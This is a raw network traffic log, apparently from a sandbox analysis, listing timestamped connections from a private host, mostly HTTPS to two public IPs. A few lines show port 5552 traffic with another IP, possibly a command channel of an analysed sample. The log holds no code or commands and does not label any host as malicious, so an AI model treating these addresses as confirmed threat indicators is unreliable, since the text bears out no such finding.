Dec 30, 2024 11:41:28.843796015 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.843810081 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:28.844239950 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:28.844263077 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.472043991 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.472836018 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.474020004 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.474035978 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.494138002 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.527807951 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.528589010 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.534507036 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.534535885 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.538695097 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.715914965 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.715938091 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.716305017 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.728997946 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.728997946 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.733309984 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.733340979 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.733680010 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.736407042 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.741657972 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:29.775374889 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:29.783341885 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.021886110 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.021955013 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.021975040 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.022030115 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.022245884 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.022275925 CET	443	49768	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.022330046 CET	49768	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.022769928 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.022806883 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.022815943 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.022862911 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.022875071 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.022941113 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.023051023 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.023061037 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.023180962 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.023190022 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.030296087 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.030354977 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.030466080 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.030502081 CET	443	49767	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.030572891 CET	49767	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.030915022 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.030962944 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.031025887 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.031052113 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.031083107 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.031327963 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.031595945 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.031610966 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.031856060 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.031872034 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.619787931 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.619852066 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.621635914 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.621695042 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.622406006 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.623217106 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.623230934 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.623236895 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.623493910 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.624576092 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.624582052 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.624658108 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.624814034 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.624944925 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.625242949 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.625536919 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.631139994 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.631207943 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.631927967 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.632019043 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.633569956 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.633574963 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.633802891 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.633902073 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.634219885 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:30.660975933 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.665734053 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.669816971 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.669846058 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.670078993 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.670178890 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.670536041 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:30.671320915 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.671324968 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:30.675323963 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:30.711337090 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.002654076 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.003635883 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.004205942 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.005450010 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.005454063 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.005480051 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.005548000 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.005616903 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.005783081 CET	49785	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.005799055 CET	443	49785	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.005940914 CET	49782	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.005951881 CET	443	49782	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.006309032 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.006336927 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.006422997 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.006448030 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.007519960 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.007622004 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.007862091 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.007878065 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.007922888 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.007930994 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.062310934 CET	5552	49737	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:31.062376976 CET	49737	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:31.062972069 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.063024998 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.063122988 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.063159943 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.063159943 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.064244032 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.064296007 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.064315081 CET	49783	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.064330101 CET	443	49783	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.064407110 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.064582109 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.064595938 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.121994019 CET	49737	5552	192.168.2.7	172.111.138.100
Dec 30, 2024 11:41:31.126775980 CET	5552	49737	172.111.138.100	192.168.2.7
Dec 30, 2024 11:41:31.250274897 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.250334978 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.250458002 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.253017902 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.264786959 CET	49784	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.264827013 CET	443	49784	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.266475916 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.266515970 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.266578913 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.271189928 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.271202087 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.608146906 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.608212948 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.608587980 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.608597040 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.610348940 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.610358000 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.633909941 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.638642073 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.640481949 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.640481949 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.640503883 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.640528917 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.662533045 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.662616014 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.662954092 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.662967920 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.663113117 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.663120031 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.898552895 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.901732922 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.905514002 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.905524015 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.905694962 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:31.905699015 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:31.972443104 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.973431110 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.986462116 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.986990929 CET	49792	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.987015009 CET	443	49792	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.987747908 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.987804890 CET	443	49802	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:31.989295959 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.989639997 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:31.989660978 CET	443	49802	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.012912989 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.015248060 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.015258074 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.015572071 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.017339945 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.018533945 CET	49791	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.018542051 CET	443	49791	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.018985987 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.019007921 CET	443	49807	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.019076109 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.019265890 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.019274950 CET	443	49807	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.063256979 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.063308001 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.063417912 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.071034908 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.074022055 CET	49794	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.074062109 CET	443	49794	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.074487925 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.074529886 CET	443	49809	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.086658001 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.087143898 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.087157011 CET	443	49809	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.321468115 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.321526051 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.321626902 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.325969934 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.458632946 CET	49796	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.458664894 CET	443	49796	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.459100008 CET	49810	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.459125042 CET	443	49810	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.459487915 CET	49810	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.459760904 CET	49810	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.459774971 CET	443	49810	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.589972019 CET	443	49802	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.590039015 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.590409994 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.590425968 CET	443	49802	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.590687037 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.590696096 CET	443	49802	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.630403042 CET	443	49807	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.630470991 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.631488085 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.631508112 CET	443	49807	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.631953955 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.631967068 CET	443	49807	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.682169914 CET	443	49809	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.682231903 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.682662010 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.682676077 CET	443	49809	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.684708118 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.684712887 CET	443	49809	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:32.832161903 CET	49810	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.832200050 CET	49802	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.832250118 CET	49807	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.832288027 CET	49809	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:32.833914995 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.833946943 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.834009886 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.835706949 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.835747957 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.835815907 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.837250948 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.837264061 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:32.987385988 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:32.987411022 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.522454023 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.522550106 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.523257971 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.523272038 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.525306940 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.525311947 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.605882883 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.606400013 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.606400013 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.606412888 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.606882095 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.606893063 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.986442089 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.986613035 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.986712933 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.986752987 CET	443	49818	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.986807108 CET	49818	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.987292051 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.987291098 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:33.987328053 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:33.987328053 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.987392902 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.987451077 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:33.987601042 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.987612009 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.987911940 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:33.987924099 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:33.992048979 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.992269993 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.992355108 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.992398977 CET	443	49819	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.992485046 CET	49819	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.992788076 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.992819071 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.992868900 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:33.992872000 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.992894888 CET	443	49829	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:33.992990017 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:33.993026018 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:33.993037939 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:33.993299961 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:33.993318081 CET	443	49829	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.586085081 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.586245060 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.586865902 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.586898088 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.586935043 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.587116957 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.589977980 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.589998960 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.590270996 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.590351105 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.591799021 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.591958046 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.592571020 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.592726946 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.592807055 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.592819929 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.593106985 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.593199968 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.593485117 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.594129086 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.596071959 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.596084118 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.596363068 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.596442938 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.597700119 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:34.611536980 CET	443	49829	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.611717939 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.614144087 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.614156961 CET	443	49829	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.614403009 CET	443	49829	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.614533901 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.615087032 CET	49829	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:34.639333963 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.639333963 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.639353037 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.659336090 CET	443	49829	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:34.970463991 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.971477032 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:34.976722002 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.007004976 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:35.007061958 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:35.007154942 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:35.008697987 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:35.061598063 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:35.061676025 CET	443	49826	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:35.061738968 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.061738968 CET	49826	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.118926048 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.118956089 CET	443	49828	172.217.18.110	192.168.2.7
Dec 30, 2024 11:41:35.118988037 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.119050026 CET	49828	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.122318029 CET	49827	443	192.168.2.7	142.250.185.193
Dec 30, 2024 11:41:35.122322083 CET	49836	443	192.168.2.7	172.217.18.110
Dec 30, 2024 11:41:35.122334003 CET	443	49827	142.250.185.193	192.168.2.7
Dec 30, 2024 11:41:35.122353077 CET	443	49836	172.217.18.110	192.168.2.7
